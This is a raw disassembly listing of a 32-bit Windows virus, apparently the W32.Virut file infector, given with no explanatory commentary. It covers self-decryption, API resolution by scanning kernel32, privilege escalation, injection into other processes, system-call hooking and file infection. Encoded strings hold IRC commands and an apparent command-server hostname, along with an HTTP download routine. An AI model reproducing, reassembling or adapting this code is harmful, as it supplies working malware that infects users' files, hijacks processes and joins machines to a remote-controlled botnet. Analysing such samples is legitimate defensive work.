dd 0FFFFE68Ah, 39BE9530h, 20B10010h, 39BFB530h, 206A0010h
dd 7858C9FEh, 0E670E814h, 0D285FFFFh, 0D3C2940Fh, 0C09531E2h
dd 0EB001039h, 0C085F7E5h, 1039h, 74020000h, 0C085F722h
dd 3001039h, 75000000h, 0C0A5810Ch, 0FF001039h, 0EBF7FFFFh
dd 0C08D810Ah, 1039h, 68100000h, 6, 66859h, 0E8580000h
dd 0FFFFE622h, 39B8858Ah, 84860010h, 1039B82Ah, 0B8858800h
dd 0E2001039h, 0C085F7E0h, 8001039h, 75000000h, 0BABD8009h
dd 1001039h, 85F7C574h, 1039C0h, 10000000h, 0BD801B74h
dd 1039B8h, 80B07405h, 1039B9BDh, 0A7740500h, 39BABD80h
dd 74050010h, 0C085F79Eh, 1039h, 74004000h, 0B8BD8009h
dd 2001039h, 0A5838977h, 104300h, 0F272E800h, 43E8FFFFh
dd 0E8FFFFFDh, 271h, 42B89D8Bh, 9D030010h, 1042BCh, 0FFFC5BE8h
dd 51840FFFh, 8B000002h, 1042B4B5h, 3C5E8B00h, 5CE8DE03h
dd 0FFFFFFDh, 23B82h, 244A8100h, 0E0000060h, 5652FE8Bh
dd 3147A03h, 85F7107Ah, 1039C0h, 20000000h, 0BD891475h
dd 104304h, 39CCB58Dh, 8D8B0010h, 101069h, 0B957A4F3h
dd 0A73h, 1000B58Dh, 0A5F30010h, 2E300B1h, 85F7A4F3h, 1039C0h
dd 20000000h, 0AE840Fh, 73FF0000h, 0ED9DE828h, 958BFFFFh
dd 1042F4h, 840FD285h, 98h, 42B4B58Bh, 4A8B0010h, 244A8110h
dd 0E0000060h, 73084A2Bh, 3C93302h, 8D3B1472h, 101069h
dd 10698D8Bh, 56720010h, 83243C8Bh, 101069A5h, 0A7830000h
dd 69h, 87A8B00h, 3084A01h, 8BF787F7h, 1042C885h, 0C085F700h
dd 40001039h, 74000000h, 318F702h, 30290C72h, 4300B589h
dd 738B0010h, 0F7300128h, 1039C085h, 4000h, 0F7027400h
dd 2BE85118h, 59FFFFFCh, 73030CEBh, 0C722B28h, 0A4F35651h
dd 0B58D595Fh, 1039CCh, 4304BD89h, 0A4F30010h, 310F5E5Fh
dd 37878D92h, 3A000001h, 1039BE95h, 69067500h, 345678D2h
dd 50896612h, 0D9E1E8E7h, 8B5AFFFFh, 4A030C4Ah, 0C085F710h
dd 1039h, 8D200000h, 13750541h, 43008D89h, 85030010h, 101069h
dd 69A783h, 2B000000h, 87892843h, 54h, 3F7C85F7h, 10010h
dd 7740000h, 0A00843C7h, 0F7A0A0A0h, 1039C085h, 40000000h
dd 52077400h, 0FFF75BE8h, 8D8B5AFFh, 104300h, 4B8905E3h
dd 8B0DEB28h, 1042FC8Dh, 0EB02E300h, 284B8B03h, 39C085F7h
dd 30010h, 14740000h, 4304858Bh, 8D030010h, 1042ECh, 42E88503h
dd 8010010h, 8B104A8Bh, 1042B885h, 84A3900h, 4A890373h
dd 10420108h, 586383h, 42C0858Bh, 0CC680010h, 1000029h
dd 1590842h, 958A5043h, 1039BEh, 39C085F7h, 10h, 6742000h
dd 10698D03h, 0B60010h, 39C085F7h, 10h, 14750002h, 85F7C6FEh
dd 1039C0h, 40000h, 0B58A0675h, 1039BFh, 39C085F7h, 40000010h
dd 0B750000h, 0C202078Ah, 0E2D602AAh, 8A09EBF7h, 0AAC23207h
dd 0F7E2D602h, 8B64D233h, 28F6422h, 98BD8358h, 1042h, 0FABF840Fh
dd 0B5FFFFFFh, 1042B4h, 3EEE95FFh, 0B5FF0010h, 1042B0h
dd 3E6295FFh, 8D8D0010h, 10429Ch, 42A4958Dh, 52510010h
dd 0B5FF006Ah, 104298h, 3EE295FFh, 0B5FF0010h, 104298h
dd 3E6295FFh, 0B58D0010h, 104184h, 4294B5FFh, 0FF560010h
dd 103EDE95h, 98A58300h, 1042h, 0E8C3h, 6A5D0000h, 0CBED8101h
dd 58001038h, 85C10FF0h, 101588h, 83C3C085h, 0FF0FFC8h
dd 158885C1h, 3DC30010h, 2A0010h, 81661C75h, 6C0C247Ch
dd 60137571h, 0FFFFC4E8h, 0E80575FFh, 0FFFFFAB5h, 0FFFFD2E8h
dd 0FF2E61FFh, 3456782Dh, 4D0DB812h, 0E8600369h, 0FFFFFFA5h
dd 448B3975h, 0B58D3024h, 104184h, 6608508Bh, 2063A81h
dd 68562573h, 0FF0000h, 6AC48Bh, 95FF5052h, 103F2Eh, 8108C483h
dd 3F3F5C3Eh, 8303755Ch, 62E804C6h, 0E8FFFFFAh, 0FFFFFF7Fh
dd 0DFB8C361h, 0EB036946h, 4C8FB8B1h, 1DE80369h, 0C2000000h
dd 30B80020h, 0E8000000h, 10h, 0B80024C2h, 185h, 3E8h
dd 2CC200h, 0C24548Dh, 0F8832ECDh, 60197C00h, 0E8h, 24548B00h
dd 1A8B5D30h, 39A2ED81h, 0B3E80010h, 61FFFFE0h, 20004C2h
dd 1050306h, 5ECC9C07h, 0FF578B49h, 6DE3D815h, 0FF8B00h
dd 58h dup(0)
db 90h
; ---------------------------------------------------------------------------
call $+5
mov eax, [esp]
test dword ptr [eax+242Bh], 80000000h
mov [eax+29ACh], ebx
mov ebx, [esp+4]
jz short loc_414C4C
cld
pop ecx
mov [eax+29B0h], esi
mov [eax+29B4h], edi
cmp byte ptr [eax+242Fh], 0E8h
jnz short loc_414C43
add ebx, [eax+2430h]
mov ebx, [ebx+2]
push dword ptr [ebx]
jmp short loc_414C4B
; ---------------------------------------------------------------------------
loc_414C43: ; CODE XREF: __u_____:00414C34�j
mov ebx, [eax+2431h]
push dword ptr [ebx]
loc_414C4B: ; CODE XREF: __u_____:00414C41�j
pop ebx
loc_414C4C: ; CODE XREF: __u_____:00414C1D�j
push ebp
xchg eax, ebp
sub dword ptr [esp+4], 2C06h
and ebx, 0FFFFF000h
sub ebp, 401006h
mov edi, [esp+4]
lea esi, loc_40343C[ebp]
mov ecx, 71h
rep movsb
loc_414C73: ; CODE XREF: __u_____:00414C8F�j
cmp dword ptr [ebx+4Eh], 73696854h
jnz short loc_414C89
mov eax, [ebx+3Ch]
lea eax, [eax+ebx]
cmp word ptr [eax], 4550h
jz short loc_414C91
loc_414C89: ; CODE XREF: __u_____:00414C7A�j
sub ebx, 100h
jnz short loc_414C73
loc_414C91: ; CODE XREF: __u_____:00414C87�j
mov edx, [eax+78h]
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_414C9F: ; CODE XREF: __u_____:loc_414CC6�j
lodsd
add eax, ebx
cmp dword ptr [eax-1], 74654700h
jnz short loc_414CC6
cmp dword ptr [eax+3], 636F7250h
jnz short loc_414CC6
cmp dword ptr [eax+7], 72646441h
jnz short loc_414CC6
cmp dword ptr [eax+0Bh], 737365h
jz short loc_414CCB
loc_414CC6: ; CODE XREF: __u_____:00414CA9�j
; __u_____:00414CB2�j ...
loop loc_414C9F
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_414CCB: ; CODE XREF: __u_____:00414CC4�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
call near ptr loc_414CF1+2
inc ebx
insb
outsd
jnb short near ptr loc_414D4F+2
dec eax
popa
outsb
db 64h
insb
loc_414CF1: ; CODE XREF: __u_____:00414CE2�p
add gs:[ebx-1], dl
setalc
mov [ebp+40353Ch], eax
call near ptr loc_414D0D+1
inc ebx
jb short near ptr loc_414D68+1
popa
jz short near ptr loc_414D68+4
inc ebp
jbe short near ptr loc_414D6E+1
outsb
jz short near ptr loc_414D4C+2
loc_414D0D: ; CODE XREF: __u_____:00414CFC�p
add [ebx-1], dl
setalc
mov [ebp+403540h], eax
call sub_414D29
inc edi
db 65h
jz short near ptr loc_414D68+4
popa
jnb short loc_414D97
inc ebp
jb short near ptr loc_414D97+1
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_414D29 proc near ; CODE XREF: __u_____:00414D17�p
var_2A = byte ptr -2Ah
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_1 = byte ptr 5
arg_A = byte ptr 0Eh
; FUNCTION CHUNK AT 00414DD2 SIZE 000000B1 BYTES
; FUNCTION CHUNK AT 00414F12 SIZE 000000D0 BYTES
; FUNCTION CHUNK AT 00414FF1 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0041502A SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0041502E SIZE 0000001E BYTES
push ebx
call esi
mov [ebp+403544h], eax
call sub_414DA7
test eax, eax
jz short loc_414D5C
push eax
call dword ptr [ebp+403544h]
test eax, eax
jnz short loc_414D56
lea eax, [ebp+4011D2h]
loc_414D4C: ; CODE XREF: __u_____:00414D0B�j
mov dl, [eax-1]
loc_414D4F: ; CODE XREF: __u_____:00414CEA�j
call sub_414DC2
jmp short loc_414DD2
; ---------------------------------------------------------------------------
loc_414D56: ; CODE XREF: sub_414D29+1B�j
; sub_414D29+136�j ...
call dword ptr [ebp+40353Ch]
loc_414D5C: ; CODE XREF: sub_414D29+10�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_414D86
loc_414D68: ; CODE XREF: __u_____:00414D02�j
; __u_____:00414D05�j ...
lea esi, loc_403435[ebp]
loc_414D6E: ; CODE XREF: __u_____:00414D08�j
mov edi, [esp+8+var_4]
movsb
movsd
mov ebx, dword ptr ss:loc_4039B2[ebp]
mov esi, [ebp+4039B6h]
mov edi, [ebp+4039BAh]
loc_414D86: ; CODE XREF: sub_414D29+3D�j
pop ebp
retn
sub_414D29 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_414D88: ; CODE XREF: sub_414DA7+2�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
; ---------------------------------------------------------------------------
db 8Bh
; ---------------------------------------------------------------------------
loc_414D97: ; CODE XREF: __u_____:00414D21�j
; __u_____:00414D24�j
les ebp, [edx+0]
push eax
push 0Ch
mov eax, esp
jmp edx
; ---------------------------------------------------------------------------
aVt_3 db 'VT_3',0
db 0
; =============== S U B R O U T I N E =======================================
sub_414DA7 proc near ; CODE XREF: sub_414D29+9�p
; __u_____:loc_415A4C�p
xor ecx, ecx
call loc_414D88
lea edx, [ebp+4011A1h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+403540h]
add esp, 20h
retn
sub_414DA7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_414DC2 proc near ; CODE XREF: sub_414D29:loc_414D4F�p
; sub_416B96+25B�p
mov dh, dl
mov ecx, 225Fh
loc_414DC9: ; CODE XREF: sub_414DC2+C�j
xor [eax], dl
inc eax
add dl, dh
loop loc_414DC9
retn
sub_414DC2 endp
; ---------------------------------------------------------------------------
db 7Eh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_414D29
loc_414DD2: ; CODE XREF: sub_414D29+2B�j
and dword ptr [ebp+401580h], 0
and dword ptr [ebp+401584h], 0
and dword ptr [ebp+401588h], 0
mov eax, [ebp+403431h]
xor ecx, ecx
push 1
mov cl, 20h
pop dword ptr [ebp+40397Eh]
loc_414DF9: ; CODE XREF: sub_414D29+E0�j
xor edx, edx
shr eax, 1
setb dl
shl dl, 3
add [ebp+40397Eh], edx
loop loc_414DF9
push edi
mov byte ptr [ebp+401303h], 1
mov dword ptr ss:loc_403548[ebp], esi
lea esi, [ebp+4015BBh]
xor ecx, ecx
lea edi, [ebp+403558h]
mov cl, 1Eh
call sub_41518C
pop edi
call dword ptr [ebp+403594h]
shr eax, 1Fh
jz loc_414F12
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+403550h], eax
push 69CEh
push 0
call dword ptr [ebp+4035C8h]
test eax, eax
jz loc_414D56
xchg eax, edi
lea esi, dword_401000[ebp]
mov ebp, edi
mov ecx, 0A74h
sub ebp, offset dword_401000
lea edx, [ebp+401283h]
rep movsd
jmp edx
; END OF FUNCTION CHUNK FOR sub_414D29
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+401A3Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+403550h]
add esp, 20h
test eax, eax
jz loc_414D56
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+403550h]
test eax, eax
jz loc_414D56
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+403550h]
push 1000Ah
call dword ptr [ebp+403550h]
call sub_414F02
jmp loc_414D56
; =============== S U B R O U T I N E =======================================
sub_414F02 proc near ; CODE XREF: __u_____:00414EF8�p
; sub_414F02+D�j
push 1
pop ecx
jecxz short locret_414F11
push 0Ah
call dword ptr [ebp+4035BCh]
jmp short sub_414F02
; ---------------------------------------------------------------------------
locret_414F11: ; CODE XREF: sub_414F02+3�j
retn
sub_414F02 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_414D29
loc_414F12: ; CODE XREF: sub_414D29+10F�j
cmp dword ptr ss:loc_403570[ebp], 0
jz loc_414D56
call near ptr loc_414F29+1 ; CODE XREF: sub_414D29+257�j
dec esi
push esp
inc esp
dec esp
dec esp
loc_414F29: ; CODE XREF: sub_414D29+1F6�p
add bh, bh
xchg eax, ebp
mov ds:0B58D0040h, dh
jnb short near ptr loc_414F46+5
inc eax
inc edi
wait
cmp byte ptr [ebp+ebp*4+8], 83h ; CODE XREF: sub_414D29+26B�j
jl short near ptr loc_414F6B+4
add edx, [ecx-7F525F84h]
jl short $+2
loc_414F46: ; CODE XREF: sub_414D29+209�j
cmp dword ptr [ebp+4035F8h], 0
mov dh, 0BDh
cmp [esp+0Ch+arg_A], 80h ; CODE XREF: sub_414D29+247�j
loc_414F54: ; CODE XREF: sub_414D29+2A7�j
jl short near ptr loc_414FAF+3
xchg eax, esp
cmp byte ptr [edi+23h], 80h
jl short near ptr loc_414F86+4
add al, 81h
jl short near ptr loc_414F96+3
push es
cmp dword ptr [edi+ecx+4Bh], 0C0587C86h ; CODE XREF: sub_414D29+263�j
loc_414F6B: ; CODE XREF: sub_414D29+213�j
cmp byte ptr [esp+ebp*8-19h], 80h
jl short near ptr loc_414F4F+1 ; CODE XREF: sub_414D29+2B3�j
stosd
cmp [esp+edi+10h+arg_1], 81h
jl short loc_414FF1
or al, [ecx-7CE3BA84h]
jl short near ptr loc_414F1F+4
mov dh, 80h
jl short near ptr loc_414F84+1 ; CODE XREF: sub_414D29:loc_414F84�j
loc_414F86: ; CODE XREF: sub_414D29+233�j
or [esi-7CA23584h], al
jl short near ptr loc_414F63+5
adc [ecx-7ED52184h], eax ; CODE XREF: sub_414D29+27F�j
jl short near ptr loc_414F37+4
loc_414F96: ; CODE XREF: sub_414D29+237�j
sbb eax, [edx-7FE28884h]
jl short loc_414FA3
mov ecx, 0BB767C80h
loc_414FA3: ; CODE XREF: sub_414D29+273�j
cmp byte ptr [ecx+9], 83h
jl short near ptr loc_414F8E+1
cmp eax, 3F587C86h
loc_414FAF: ; CODE XREF: sub_414D29:loc_414F54�j
xchg bh, [edx+eax*4+27h]
cmp dword ptr [eax+edi*4+1Ch], 24427C83h
cmp [esp+ebx+10h+var_5], 81h
jl short near ptr loc_415034+2
mov ecx, 9A517C80h
cmp byte ptr [edi+eax*4+0Dh], 81h
jl short loc_41502E
aam 90h
jl short loc_414F54
setalc
nop
jl short loc_41502A
xlat
nop
jl short near ptr loc_41503E+5
xlat
nop
jl short near ptr loc_414F70+1
xlat
nop
jl short $+2
; END OF FUNCTION CHUNK FOR sub_414D29
; ---------------------------------------------------------------------------
dw 0
dd 90DC5500h, 90DCFD7Ch, 90DD907Ch
db 7Ch
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_414D29
loc_414FF1: ; CODE XREF: sub_414D29+24F�j
mov edx, 0B67C90DDh
ficom word ptr [eax-6F1FBA84h]
jl short near ptr loc_41502E+2
jmp far ptr 7C91h:30C67C90h
; END OF FUNCTION CHUNK FOR sub_414D29
; ---------------------------------------------------------------------------
db 8Bh, 0D4h, 6Ah
dd 6ACC8B00h, 6A006A40h, 6A5202h, 69CE68h, 51006A00h, 0FF50FF6Ah
dd 4035E495h, 85595F00h
; ---------------------------------------------------------------------------
dec dword ptr [edi]
; START OF FUNCTION CHUNK FOR sub_414D29
loc_41502A: ; CODE XREF: sub_414D29+2AB�j
test [edi], ah
std
; END OF FUNCTION CHUNK FOR sub_414D29
; ---------------------------------------------------------------------------
db 0FFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_414D29
loc_41502E: ; CODE XREF: sub_414D29+2A3�j
; sub_414D29+2D3�j
dec dword ptr [ebp+401000B5h]
loc_415034: ; CODE XREF: sub_414D29+297�j
add [ecx+0A74h], bh
mov ebp, edi
rep movsd
loc_41503E: ; CODE XREF: sub_414D29+2AF�j
sub ebp, offset dword_401000
lea eax, [ebp+40144Ch]
jmp eax
; END OF FUNCTION CHUNK FOR sub_414D29
; ---------------------------------------------------------------------------
db 8Dh ;
db 95h, 0E0h, 18h
db 40h ; @
align 2
dw 0FF52h
db 95h ; •
dd offset loc_40359A+2
db 0E8h, 16h, 0
db 0
align 2
aLookupprivileg db 'LookupPrivilegeValueA',0
dd 4895FF50h, 89004035h, 40354C85h, 6A545000h, 0FFFF6A20h
dd 4035EC95h, 5FC08500h, 6A963F75h, 8B565602h, 52016AD4h
dd 11E8h, 44655300h, 67756265h, 76697250h, 67656C69h, 0FF560065h
dd 40354C95h, 56C48B00h, 56505656h, 0D095FF57h, 83004035h
dd 0FF5710C4h, 40353C95h, 6A006A00h, 7095FF02h, 0B9004035h
dd 128h, 89E12B97h, 5754240Ch, 35AC95FFh, 0F6330040h, 363CA583h
dd 54000040h, 0B095FF57h, 85004035h, 465C74C0h, 7204FE83h
dd 2474FFEEh, 6A006A08h, 0A895FF2Ah, 85004035h, 93DC74C0h
dd 43DE8h, 91C93300h, 853930E3h, 40363Ch, 0C1812875h, 0DAEh
dd 56505450h, 53505051h, 356895FFh, 0C0850040h, 0FF0F7459h
dd 8F082474h, 40363C85h, 0FDACE800h, 0FF53FFFFh, 40353C95h
dd 8198EB00h, 128C4h, 95FF5700h, 40353Ch, 0FFFBE5E9h, 498DFFh
dd 585858h, 29CEh, 0D65h, 3 dup(0)
; =============== S U B R O U T I N E =======================================
sub_41518C proc near ; CODE XREF: sub_414D29+100�p
; sub_41518C+10�j
push ecx
push esi
push ebx
call dword ptr ss:loc_403548[ebp]
stosd
pop ecx
loc_415197: ; CODE XREF: sub_41518C+E�j
lodsb
test al, al
jnz short loc_415197
loop sub_41518C
retn
sub_41518C endp
; ---------------------------------------------------------------------------
aBasenamedobjec db '\BaseNamedObjects\W32_Virtu',0
aLstrlen db 'lstrlen',0
aCreatefilea db 'CreateFileA',0
aCreatefilemapp db 'CreateFileMappingA',0
aCreateprocessa db 'CreateProcessA',0
aCreateremoteth db 'CreateRemoteThread',0
aCreatethread db 'CreateThread',0
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0
aExitthread db 'ExitThread',0
aFiletimetosyst db 'FileTimeToSystemTime',0
aGetfileattribu db 'GetFileAttributesA',0
aGetfilesize db 'GetFileSize',0
aGetfiletime db 'GetFileTime',0
aGetmodulehandl db 'GetModuleHandleA',0
aGettempfilenam db 'GetTempFileNameA',0
aGettemppatha db 'GetTempPathA',0
aGetversion db 'GetVersion',0
aGetversionexa db 'GetVersionExA',0
aLoadlibrarya_0 db 'LoadLibraryA',0
aMapviewoffile db 'MapViewOfFile',0
aOpenfilemappin db 'OpenFileMappingA',0
aOpenprocess db 'OpenProcess',0
aProcess32first db 'Process32First',0
aProcess32next db 'Process32Next',0
aSetfileattribu db 'SetFileAttributesA',0
aSetfiletime db 'SetFileTime',0
aSleep db 'Sleep',0
aSystemtimetofi db 'SystemTimeToFileTime',0
aUnmapviewoffil db 'UnmapViewOfFile',0
aVirtualalloc db 'VirtualAlloc',0
aWritefile db 'WriteFile',0
aNtadjustprivil db 'NtAdjustPrivilegesToken',0
aNtcreatefile db 'NtCreateFile',0
aNtcreateproces db 'NtCreateProcess',0
aNtcreateproc_0 db 'NtCreateProcessEx',0
aNtcreatesectio db 'NtCreateSection',0
dw 744Eh
dd 5670614Dh, 4F776569h, 63655366h, 0FF6F6974h, 4FFFFFFFh
dd 466E6570h, 656C69h, 704F744Eh, 72506E65h, 7365636Fh
dd 6B6F5473h, 4E006E65h, 6F725074h, 74636574h, 74726956h
dd 4D6C6175h, 726F6D65h, 744E0079h, 74697257h, 72695665h
dd 6C617574h, 6F6D654Dh, 52007972h, 6E556C74h, 646F6369h
dd 72745365h, 54676E69h, 736E416Fh, 72745369h, 676E69h
dd 53415357h, 74726174h, 63007075h, 65736F6Ch, 6B636F73h
dd 63007465h, 656E6E6Fh, 67007463h, 6F687465h, 79627473h
dd 656D616Eh, 63657200h, 65730076h, 7300646Eh, 656B636Fh
dd 6E490074h, 6E726574h, 6C437465h, 4865736Fh, 6C646E61h
dd 6E490065h, 6E726574h, 65477465h, 6E6F4374h, 7463656Eh
dd 74536465h, 657461h, 65746E49h, 74656E72h, 6E65704Fh
dd 6E490041h, 6E726574h, 704F7465h, 72556E65h, 4900416Ch
dd 7265746Eh, 5274656Eh, 46646165h, 656C69h, 41564441h
dd 32334950h, 4C4C442Eh, 67655200h, 736F6C43h, 79654B65h
dd 67655200h, 6E65704Fh, 4579654Bh, 52004178h, 75516765h
dd 56797265h, 65756C61h, 417845h, 53676552h, 61567465h
dd 4565756Ch, 83004178h, 0C82B05E9h, 6851h, 4C8DE800h
dd 6A0324h, 5051056Ah, 8B056A53h, 0D48B50CCh, 406A5450h
dd 0FF535251h, 4035F095h, 0CC48300h, 35F495FFh, 0C4830040h
dd 8D57C308h, 4015B185h, 50FF3300h, 0E6A006Ah, 35A495FFh
dd 0C0850040h, 90840Fh, 68500000h, 69CEh, 6AD48Bh, 406ACC8Bh
dd 10000068h, 52026A00h, 0CE68006Ah, 6A000069h, 50535100h
dd 35E495FFh, 595F0040h, 353C95FFh, 0FF850040h, 8D8B5C74h
dd 401588h, 958D0CE3h, 401000h, 5357D103h, 858BD2FFh, 4035D4h
dd 23948F8Dh, 54E80000h, 8BFFFFFFh, 4035E885h, 0E18F8D00h
dd 0E8000023h, 0FFFFFF43h, 35D8858Bh, 8F8D0040h, 23E8h
dd 0FFFF32E8h, 0DC858BFFh, 85004035h, 8D0B74C0h, 23F58Fh
dd 0FF1DE800h, 0C78BFFFFh, 0E855C35Fh, 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 401A14h
xor ecx, ecx
lea eax, [ebp+401DAEh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+40356Ch]
xchg eax, [esp]
call dword ptr [ebp+40353Ch]
pop ebp
retn 4
; ---------------------------------------------------------------------------
db 55h, 0E8h, 0
dd 5D000000h, 1A43ED81h, 0FF6A0040h, 1A0E958Dh, 52500040h
dd 2420CDh, 0C483002Ah, 85C7660Ch, 401A54h, 85C720CDh
dd 401A56h, 2A0024h, 16AC35Dh, 33FF016Ah, 0FF0473FFh, 74C08515h
dd 0B68F0h, 0D08B0000h, 3C50035Bh, 1A72B58Dh, 0BA8B0040h
dd 10Ch, 1088A8Bh, 0F8030000h, 8B60CB2Bh, 61A6F3CBh, 0E2470574h
dd 83C2EBF5h, 8B570FC7h, 0CC8B53D4h, 406A5450h, 0FF6A5251h
dd 35F095FFh, 0C4830040h, 74958B0Ch, 2B004035h, 7EA83D7h
dd 6A07C7h, 578900E8h, 1A6AC303h, 9E858h, 428D0000h, 0C9FEAA61h
db 75h, 0F0h, 0C3h
; =============== S U B R O U T I N E =======================================
sub_4156EF proc near ; CODE XREF: sub_415F5A+1B�p
; sub_4160D2+3�p ...
imul edx, [ebp+403646h], 8088405h
inc edx
mov [ebp+403646h], edx
mul edx
retn
sub_4156EF endp
; ---------------------------------------------------------------------------
db 55h
dd 0E8h, 0ED815D00h, 401B09h, 364A9D8Bh, 7C830040h, 0F000824h
dd 0B984h, 8EC8100h, 54000002h, 10468h, 9095FF00h, 8B004035h
dd 24848DFCh, 104h, 0E8006A50h, 4, 545256h, 8C95FF57h
dd 33004035h, 4978DC9h, 51000001h, 51026A51h, 68016Ah
dd 52400000h, 355C95FFh, 85960040h, 505B74F6h, 1046854h
dd 0FF570000h, 22024B4h, 95FF0000h, 403628h, 74C08559h
dd 5014E316h, 6AD48Bh, 56575152h, 35CC95FFh, 85590040h
dd 56D075C0h, 353C95FFh, 578D0040h, 6A575244h, 978D5844h
dd 104h, 6AC033ABh, 0ABF35910h, 50505050h, 52505050h, 356495FFh
dd 0C4810040h, 208h, 82474FFh, 361895FFh, 0FF530040h, 40361895h
dd 4C25D00h, 0A3E8000h, 8B460175h, 4015848Dh, 8D19E300h
dd 40100095h, 56D10300h, 0C084D2FFh, 11F880Fh, 840F0000h
dd 110h, 753A3E80h, 3E804610h, 1840F00h, 80000001h, 0F175203Eh
dd 503E8146h, 75474E49h, 0C6CF8B42h, 2B4F0146h, 6A51CEh
dd 0FF535651h, 40361095h, 0C13B5900h, 0DF850Fh, 858D0000h
dd 401DA2h, 0C68006Ah, 50000000h, 1095FF53h, 3D004036h
dd 0Ch, 0BF850Fh, 0B1E90000h, 81000000h, 4952503Eh, 0A5850F56h
dd 83000000h, 3CAC08C6h, 99840F0Dh, 3C000000h, 0ACF37520h
dd 850F3A3Ch, 8Ch, 20200DADh, 213D2020h, 75746567h, 203CAC7Fh
dd 7E817C75h, 746820FFh, 81717574h, 3A70037Eh, 68752F2Fh
dd 0FF47C6h, 10BA310Fh, 0F7000027h, 95FF52E2h, 4035BCh
dd 5050C033h, 9E85050h, 44000000h, 6C6E776Fh, 64616Fh
dd 362095FFh, 0C0850040h, 0C9333674h, 364A8589h, 68510040h
dd 80000200h, 50565151h, 362495FFh, 958D0040h, 401B03h
dd 54C93350h, 51525051h, 6C95FF51h, 87004035h, 95FF2404h
dd 40353Ch, 8D80C3F8h, 401577h, 53C3F901h, 5754464Fh, 5C455241h
dd 7263694Dh, 666F736Fh, 69575C74h, 776F646Eh, 75435C73h
dd 6E657272h, 72655674h, 6E6F6973h, 7078455Ch, 65726F6Ch
dd 61540072h, 74656772h, 74736F48h, 0FF000200h, 8F7255F0h
dd 6F7270D0h, 2E6D6978h, 67637269h, 78616C61h, 6C702E79h
dd 43494E00h, 6675204Bh, 686A7A64h, 550A6377h, 20524553h
dd 30323076h, 20313035h, 202E202Eh, 4F4A2D3Ah, 26204E49h
dd 74726976h, 0E8550A75h, 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 401DB4h
mov byte ptr [ebp+401577h], 0
call dword ptr [ebp+403594h]
shr eax, 1Fh
jz short loc_415A09
push 1Eh
mov esi, [ebp+403550h]
pop ecx
loc_4159D6: ; CODE XREF: __u_____:loc_415A05�j
lodsb
cmp al, 2Eh
jnz short loc_415A05
cmp word ptr [esi], 1DFFh
jnz short loc_415A05
lea edi, loc_403640[ebp]
mov esi, [esi+2]
push edi
movsd
movsw
lea eax, [ebp+40336Ah]
pop dword ptr [ebp+403390h]
cli
mov [esi-6], eax
mov word ptr [esi-2], cs
sti
mov cl, 1
loc_415A05: ; CODE XREF: __u_____:004159D9�j
; __u_____:004159E0�j
loop loc_4159D6
jmp short loc_415A4C
; ---------------------------------------------------------------------------
loc_415A09: ; CODE XREF: __u_____:004159CB�j
lea eax, [ebp+4015B1h]
push eax
push 0
push 0Eh
call dword ptr [ebp+4035A4h]
cmp dword ptr [esp+8], 4
jnz short loc_415A4C
call near ptr loc_415A29+1
push ebx
inc esi
inc ebx
loc_415A29: ; CODE XREF: __u_____:00415A21�p
add bh, bh
xchg eax, ebp
mov ds:48E80040h, dh
cld
; ---------------------------------------------------------------------------
db 0FFh
dd 7E8FFh, 46530000h, 534F5F43h, 8895FF00h, 0E8004035h
dd 0FFFFFC31h
; ---------------------------------------------------------------------------
loc_415A4C: ; CODE XREF: __u_____:00415A07�j
; __u_____:00415A1F�j
call sub_414DA7
dec dword ptr [ebp+401303h]
call near ptr loc_415A66+1
push ebp
push ebx
inc ebp
push edx
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_415A66: ; CODE XREF: __u_____:00415A57�p
add bh, bh
xchg eax, ebp
pushf
xor eax, 0AE80040h
; ---------------------------------------------------------------------------
db 0
dd 73770000h, 6E697270h, 416674h, 4895FF50h, 89004035h
dd 40355485h, 8D310F00h, 4018E08Dh, 46858900h, 51004036h
dd 359C95FFh, 68930040h, 4, 18EDB58Dh, 8D590040h, 40362CBDh
dd 0F6D6E800h, 0C766FFFFh, 401D6785h, 83F0FF00h, 401D69A5h
dd 958D0000h, 401D27h, 16A5450h, 6852006Ah, 80000002h
dd 363095FFh, 0C0850040h, 8D22755Ah, 401D5A8Dh, 66A5200h
dd 1D67B58Dh, 56540040h, 52515050h, 363495FFh, 0FF580040h
dd 40362C95h, 4D85C600h, 4038h, 0CE8h, 4F535700h, 32334B43h
dd 4C4C442Eh, 9C95FF00h, 93004035h, 768h, 44B58D00h, 59004018h
dd 35FCBD8Dh, 51E80040h, 0E8FFFFF6h, 0Ch, 494E4957h, 2E54454Eh
dd 4C4C44h, 359C95FFh, 0C0850040h, 1E7840Fh, 68930000h
dd 5, 1882B58Dh, 8D590040h, 403618BDh, 0F61AE800h, 0BD83FFFFh
dd 40361Ch, 0C2840F00h, 81000001h, 190ECh, 1685400h, 0FF000001h
